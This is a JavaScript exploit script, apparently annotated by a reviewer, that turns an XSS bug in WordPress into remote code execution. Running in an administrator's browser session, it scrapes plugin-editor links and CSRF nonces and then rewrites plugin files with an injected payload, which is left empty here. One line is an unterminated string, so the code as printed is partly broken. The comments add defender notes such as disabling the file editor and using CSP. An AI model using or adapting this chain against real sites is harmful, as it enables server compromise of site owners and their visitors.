/*
Author: @Evex_1337
Title: Wordpress XSS to RCE
Description: This exploit uses XSS vulnerabilities in WordPress plugins/themes/core to end up executing code after being triggered by an administrator-privileged user. ¯\_(ツ)_/¯
Enjoy.
*/
//Installed Plugins Page
// Overview (reviewer note): this is a flat script meant to run inside the victim's
// browser after an XSS fires, while an administrator is logged in. It rides the
// admin's session cookies and WordPress nonces to use the built-in plugin editor,
// which is what turns a script-injection bug into a server-side file write.
// Every name below (plugins, xss_div, plugins_edit, _wpnonce, old_code, payload,
// new_code, file, injected_file) is assigned without var/let/const and so becomes
// an implicit global on the admin page.
// Defender notes: the whole chain depends on the theme/plugin file editor being
// reachable; defining DISALLOW_FILE_EDIT as true in wp-config.php removes it, so
// the editor links this script looks for never exist. A Content-Security-Policy on
// wp-admin that blocks inline script would stop the injected script from running at
// all. On the server side the activity looks like an admin opening plugin-editor
// pages and immediately POSTing "update" for them, all inside one page load.
//
// Pick the plugins list URL relative to where the XSS fired (inside /wp-admin/ or not).
plugins = (window.location['href'].indexOf('/wp-admin/') != - 1) ? 'plugins.php' : 'wp-admin/plugins.php';
//Inject "XSS" Div
// NOTE(review): the string literal below is unterminated as shown on this page — the
// appended markup (presumably an element with id "xss", given the selector used next)
// appears to have been stripped at extraction, so the line as printed is a syntax error.
jQuery('body').append('
');
// Hidden scratch element: fetched admin pages are loaded into it so jQuery selectors
// can be used to parse them.
xss_div = jQuery('#xss');
xss_div.hide();
//Get Installed Plugins Page Source and Append it to "XSS" Div
// async: false is used for every request so the script runs strictly top to bottom.
// Synchronous XHR on the main thread is deprecated in browsers and may be refused,
// in which case xss_div stays empty and nothing further happens.
jQuery.ajax({
url: plugins,
type: 'GET',
async: false,
cache: false,
timeout: 30000,
success: function (txt) {
xss_div.html(txt);
}
});
//Put All Plugins Edit URL in Array
// Every link on plugins.php whose href carries "?file=" is treated as a plugin-editor
// link. If the editor is disabled there are no such links and the loop below is a no-op.
plugins_edit = [];
xss_div.find('a').each(function () {
if (jQuery(this).attr('href').indexOf('?file=') != - 1) {
plugins_edit.push(jQuery(this).attr('href'));
}
});
//Inject Payload
// For each editor link: fetch the editor page, scrape the CSRF nonce and the current
// file body out of it, then POST the file back with `payload` prepended.
// Because the requests are synchronous, each success callback runs before `i` is
// incremented; switching to async: true would make every callback see the final `i`.
for(var i = 0; i < plugins_edit.length; i++){
jQuery.ajax({
url: plugins_edit[i],
type: 'GET',
async: false,
cache: false,
timeout: 30000,
success: function (txt) {
xss_div.html(txt);
// The nonce is scraped with a regex over the raw page HTML rather than read from the
// form field. `.context` on a jQuery object was deprecated in 1.10 and removed in 3.0,
// so this line throws on sites bundling jQuery 3 — TODO confirm against the jQuery
// version the site ships.
_wpnonce = jQuery('form#template').context.body.innerHTML.match('name="_wpnonce" value="(.*?)"')[1];
// Current contents of the file, so the write is a prepend rather than an overwrite
// (the plugin keeps working and the change is less visible).
old_code
= jQuery('form#template div textarea#newcontent')[0].value;
// Left empty on this page.
payload = '';
new_code = payload + "\n" + old_code;
// Relative plugin path taken from the editor URL's file= parameter (everything after it).
file = plugins_edit[i].split("file=")[1];
// This POST mirrors the fields of the editor's own form (_wpnonce, newcontent,
// action=update, file, submit), so server-side it is indistinguishable from an admin
// saving the file by hand except for timing and the missing referer/page flow.
jQuery.ajax({
url: plugins_edit[i],
type: 'POST',
data: {"_wpnonce":_wpnonce,"newcontent":new_code,"action":"update","file":file,"submit":"Update File"},
async: false,
cache: false,
timeout: 30000,
success: function (txt) {
xss_div.html(txt);
// Confirms the write by re-reading the editor page returned from the POST. With
// payload == '' the indexOf check is vacuously true (indexOf('') is 0).
if(jQuery('form#template div textarea#newcontent')[0].value.indexOf(payload) != -1){
// Passed, this is up to you ( skiddies Filter :D )
// `injected_file` is computed but never used on this page; the throw appears
// intended to abort the outer loop after the first successful write (an uncaught
// exception in a synchronous success callback propagates out of jQuery.ajax).
injected_file = window.location.href.split('wp-admin')[0] + "/wp-content/plugins/"+file; //http://localhost/wp//wp-content/plugins/504-redirects/redirects.php
throw new Error("");
}
}
});
}
});
}